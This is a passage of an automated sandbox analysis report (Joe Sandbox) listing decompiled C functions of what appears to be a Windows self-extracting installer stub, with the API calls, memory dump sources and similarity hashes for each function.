                                                                                                                                                                                                                                                				_t11 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                                				_t34 = _a4;
                                                                                                                                                                                                                                                				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                                				if(_t14 == 0) {
                                                                                                                                                                                                                                                					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                                					E000243D0(_t34, _t15);
                                                                                                                                                                                                                                                					_v520 = 0;
                                                                                                                                                                                                                                                					LoadStringA( *0x29a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                                					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					if(_t14 != 1) {
                                                                                                                                                                                                                                                						L4:
                                                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t32 = _a12;
                                                                                                                                                                                                                                                						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                                							_t23 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00021A18
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00021A24
                                                                                                                                                                                                                                                • LoadStringA.USER32(?,?,00000200), ref: 00021A4F
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00021A62
                                                                                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 00021A6A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                • Opcode ID: 0b92e88652bba6681857a46feb46b58293618910c849e621572d9ee0d862bc90
                                                                                                                                                                                                                                                • Instruction ID: 37a3ad43dcc0969293c381dd96739c7b2e3702c008bab25a924f321f853bfe1b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b92e88652bba6681857a46feb46b58293618910c849e621572d9ee0d862bc90
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6411C8316011199FEB20EF64EE09AEE77B8EF59310F208155F912D3191DE349E12CB96
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                			E000263C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				long _v272;
                                                                                                                                                                                                                                                				void* _v276;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t15 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                                				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_v276 = _a16;
                                                                                                                                                                                                                                                				_t37 = 1;
                                                                                                                                                                                                                                                				E00021781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                                				E0002658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                                				_t28 = 0;
                                                                                                                                                                                                                                                				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                                					_t28 = _a4;
                                                                                                                                                                                                                                                					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                                						 *0x29124 = 0x80070052;
                                                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					CloseHandle(_t39);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					 *0x29124 = 0x80070052;
                                                                                                                                                                                                                                                					_t37 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0002642D
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0002645B
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0002647A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000263EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                • API String ID: 1065093856-1116576409
                                                                                                                                                                                                                                                • Opcode ID: 5f239c5b75a2665bb90a8d52d8e5b75bbda4abb2480f4d7b7e755be55504408b
                                                                                                                                                                                                                                                • Instruction ID: 61080dc8991243b533c7c8434f4bd909362bdf16929e68cb9fde5246f4cd94bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f239c5b75a2665bb90a8d52d8e5b75bbda4abb2480f4d7b7e755be55504408b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F21D571A00228AFD720DF25ECC5FEB73BCEB49314F104169F985A3180DAB55D858F64
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000247E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                				intOrPtr* _t22;
                                                                                                                                                                                                                                                				void _t24;
                                                                                                                                                                                                                                                				struct HWND__* _t25;
                                                                                                                                                                                                                                                				struct HWND__* _t26;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __ecx;
                                                                                                                                                                                                                                                				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                                					_t22 = _t33;
                                                                                                                                                                                                                                                					_t27 = _t22 + 1;
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t6 =  *_t22;
                                                                                                                                                                                                                                                						_t22 = _t22 + 1;
                                                                                                                                                                                                                                                					} while (_t6 != 0);
                                                                                                                                                                                                                                                					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                                					 *_t34 = _t24;
                                                                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                                                                						_t28 = _t33;
                                                                                                                                                                                                                                                						_t19 = _t28 + 1;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t9 =  *_t28;
                                                                                                                                                                                                                                                							_t28 = _t28 + 1;
                                                                                                                                                                                                                                                						} while (_t9 != 0);
                                                                                                                                                                                                                                                						E00021680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                                						_t11 =  *0x291e0; // 0x2a58e90
                                                                                                                                                                                                                                                						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                                						 *0x291e0 = _t34;
                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t25 =  *0x28584; // 0x0
                                                                                                                                                                                                                                                					E000244B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                                					LocalFree(_t34);
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t26 =  *0x28584; // 0x0
                                                                                                                                                                                                                                                				E000244B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00024E6F), ref: 000247EA
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00024823
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00024847
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00024851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                • API String ID: 359063898-1116576409
                                                                                                                                                                                                                                                • Opcode ID: 8be00deb16e29d6bd5de00b708311ee51454de7fedfd675cd6c102dcced12717
                                                                                                                                                                                                                                                • Instruction ID: 2485ed4c61b4e3bfb677bc2c15c359963d02ffe4c068e793ad29ee0a3e25d882
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8be00deb16e29d6bd5de00b708311ee51454de7fedfd675cd6c102dcced12717
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9911C2796046516FE7649F24AC58FBA3B9AEBC5310F248519EE829B241DE398C078760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00026517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                				struct HRSRC__* _t6;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                                				int _t24;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t23 =  *0x29a3c; // 0x20000
                                                                                                                                                                                                                                                				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                                				if(_t6 == 0) {
                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                					E000244B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					_t24 = _a16;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                                					if(_t21 == 0) {
                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                                                                                                							_push(_a12);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                                						FreeResource(_t21);
                                                                                                                                                                                                                                                						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t24;
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00020000,000007D6,00000005), ref: 0002652A
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00020000,00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00026538
                                                                                                                                                                                                                                                • DialogBoxIndirectParamA.USER32(00020000,00000000,00000547,000219E0,00000000), ref: 00026557
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00026560
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                • Opcode ID: 9a1ea02a4ef8b35aed26424b500584e521fe0cf5b27c5784f3231c9c44f97145
                                                                                                                                                                                                                                                • Instruction ID: 71e34c3f5079d4fc1e559a3d9a0949586ea99a6ab6b5e8dc0ff99aa7c5ec654f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a1ea02a4ef8b35aed26424b500584e521fe0cf5b27c5784f3231c9c44f97145
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1001D672600A35BBEB205F69AC48DBB7AACEB86761F100125FE1093150DB76CD5186B1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00023680(void* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				struct tagMSG _v36;
                                                                                                                                                                                                                                                				int _t8;
                                                                                                                                                                                                                                                				struct HWND__* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v8 = __ecx;
                                                                                                                                                                                                                                                				_t16 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                                					if(_t8 == 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                                								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t16 = 1;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                                						} while (_t8 != 0);
                                                                                                                                                                                                                                                						if(_t16 == 0) {
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0002369F
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000236B2
                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 000236CB
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000236DA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                • Opcode ID: d735d2b6b24874dc86b3c1acb7eb35c356d51ccba1b68cb5e88d4db39b757c78
                                                                                                                                                                                                                                                • Instruction ID: 326b81f2f7dcb7cd13250b7e29d7ccffa37caf562e43ec44c294f2d87492e3c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d735d2b6b24874dc86b3c1acb7eb35c356d51ccba1b68cb5e88d4db39b757c78
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3701A772A002247BDB304BA66C4CFEF76BCEBC6B20F104119F905E2180D978C651C671
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                			E000265E8(char* __ecx) {
                                                                                                                                                                                                                                                				char _t3;
                                                                                                                                                                                                                                                				char _t10;
                                                                                                                                                                                                                                                				char* _t12;
                                                                                                                                                                                                                                                				char* _t14;
                                                                                                                                                                                                                                                				char* _t15;
                                                                                                                                                                                                                                                				CHAR* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t12 = __ecx;
                                                                                                                                                                                                                                                				_t15 = __ecx;
                                                                                                                                                                                                                                                				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                                				_t10 = 0;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t3 =  *_t12;
                                                                                                                                                                                                                                                					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                                				} while (_t3 != 0);
                                                                                                                                                                                                                                                				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                                					if(_t16 <= _t15) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                                						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                                							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *_t16 = _t10;
                                                                                                                                                                                                                                                						_t10 = 1;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_push(_t16);
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					return _t10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00022B33), ref: 00026602
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00026612
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00026629
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 00026635
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                • Opcode ID: 3526fcec7a91ee86cf7a60169fdc6e6335f8293e0a7f32a496dde07d3b5a2942
                                                                                                                                                                                                                                                • Instruction ID: 4f36fffadbe9d13c90a3a6f60cf33b1af3e96c52f8d4e49bfbc403ffb42b2af0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3526fcec7a91ee86cf7a60169fdc6e6335f8293e0a7f32a496dde07d3b5a2942
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97F028321045606FE7321B28AC8C8BBBFDCDF8B364F2901AFE89582101DA1B0D078661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000269B0() {
                                                                                                                                                                                                                                                				intOrPtr* _t4;
                                                                                                                                                                                                                                                				intOrPtr* _t5;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				 *0x281f8 = E00026C70();
                                                                                                                                                                                                                                                				__set_app_type(E00026FBE(2));
                                                                                                                                                                                                                                                				 *0x288a4 =  *0x288a4 | 0xffffffff;
                                                                                                                                                                                                                                                				 *0x288a8 =  *0x288a8 | 0xffffffff;
                                                                                                                                                                                                                                                				_t4 = __p__fmode();
                                                                                                                                                                                                                                                				_t11 =  *0x28528; // 0x0
                                                                                                                                                                                                                                                				 *_t4 = _t11;
                                                                                                                                                                                                                                                				_t5 = __p__commode();
                                                                                                                                                                                                                                                				_t12 =  *0x2851c; // 0x0
                                                                                                                                                                                                                                                				 *_t5 = _t12;
                                                                                                                                                                                                                                                				_t6 = E00027000();
                                                                                                                                                                                                                                                				if( *0x28000 == 0) {
                                                                                                                                                                                                                                                					__setusermatherr(E00027000);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E000271EF(_t6);
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00026FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00026FC5
                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 000269C2
                                                                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 000269D8
                                                                                                                                                                                                                                                • __p__commode.MSVCRT ref: 000269E6
                                                                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 00026A07
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                                                                                                                                • Opcode ID: c2d7606680b0beebe40ed236f3a7b64c2737192dadabff6307dca9e3cb6e9b24
                                                                                                                                                                                                                                                • Instruction ID: 277bb148d8d637fcfd48c74297674237892e018e934d3bb8aa685bb17f4fcf10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d7606680b0beebe40ed236f3a7b64c2737192dadabff6307dca9e3cb6e9b24
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13F0F87860A311CFE778AB38FD4A7047BA5FB05331B308619E865862E1CF3E855A8B11
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Execution Graph

